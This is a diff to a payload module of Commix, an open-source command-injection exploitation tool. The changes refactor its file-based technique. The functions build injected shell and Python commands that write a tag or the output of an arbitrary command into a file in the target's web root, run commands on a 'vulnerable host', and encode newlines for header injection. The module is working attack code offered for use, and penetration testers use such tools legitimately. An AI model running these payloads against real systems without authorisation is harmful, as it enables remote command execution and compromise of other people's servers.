@@ -3,7 +3,7 @@
 
 """
 This file is part of Commix Project (https://commixproject.com).
-Copyright (c) 2014-2024 Anastasios Stasinopoulos (@ancst).
+Copyright (c) 2014-2025 Anastasios Stasinopoulos (@ancst).
 
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
@@ -35,17 +35,18 @@ def decision(separator, TAG, OUTPUT_TEXTFILE):
               )
   else:
     payload = (separator +
-              "echo " + TAG + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE +
-              separator
+              "echo " + TAG + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE
               )
 
+    if settings.CUSTOM_INJECTION_MARKER:
+      payload = payload + separator
+
   return payload
 
 """
 __Warning__: The alternative shells are still experimental.
 """
 def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE):
-
   if settings.TARGET_OS == settings.OS.WINDOWS:
     python_payload = settings.WIN_PYTHON_INTERPRETER + " -c \"open('" + OUTPUT_TEXTFILE + "','w').write('" + TAG + "')\""
     payload = (separator +
@@ -55,17 +56,21 @@ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE):
               )
   else:
     payload = (separator +
-              "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\")"
+              settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX
                )
 
+    if settings.CUSTOM_INJECTION_MARKER:
+      payload = payload + separator
+
+  # New line fixation
   if settings.USER_AGENT_INJECTION == True or \
      settings.REFERER_INJECTION == True or \
      settings.HOST_INJECTION == True or \
      settings.CUSTOM_HEADER_INJECTION == True :
-    payload = payload.replace("\n", separator)
+    payload = payload.replace(settings.END_LINE.LF, separator)
   else:
     if settings.TARGET_OS != settings.OS.WINDOWS:
-      payload = payload.replace("\n","%0d")
+      payload = payload.replace(settings.END_LINE.LF,"%0d")
 
   return payload
 
@@ -73,7 +78,6 @@ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE):
 Execute shell commands on vulnerable host.
 """
 def cmd_execution(separator, cmd, OUTPUT_TEXTFILE):
-
   if settings.TFB_DECIMAL == True:
     payload = (separator + cmd)
 
@@ -87,10 +91,12 @@ def cmd_execution(separator, cmd, OUTPUT_TEXTFILE):
   else:
     settings.USER_APPLIED_CMD = cmd
     payload = (separator +
-              cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE +
-              separator
+              cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE
               )
 
+    if settings.CUSTOM_INJECTION_MARKER:
+      payload = payload + separator
+
   return payload
 
 """
@@ -109,19 +115,25 @@ def cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE):
                 "') do @set /p = %i " + settings.CMD_NUL
                 )
   else:
+    settings.USER_APPLIED_CMD = cmd
+    cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX
     payload = (separator +
-              "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")"
+              settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + 
+              settings.CMD_SUB_PREFIX + "echo " + cmd_exec + settings.CMD_SUB_SUFFIX + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX
               )
 
+    if settings.CUSTOM_INJECTION_MARKER:
+      payload = payload + separator
+
   # New line fixation
   if settings.USER_AGENT_INJECTION == True or \
      settings.REFERER_INJECTION == True or \
      settings.HOST_INJECTION == True or \
      settings.CUSTOM_HEADER_INJECTION == True:
-    payload = payload.replace("\n", separator)
+    payload = payload.replace(settings.END_LINE.LF, separator)
   else:
     if settings.TARGET_OS != settings.OS.WINDOWS:
-      payload = payload.replace("\n","%0d")
+      payload = payload.replace(settings.END_LINE.LF,"%0d")
 
   return payload
 
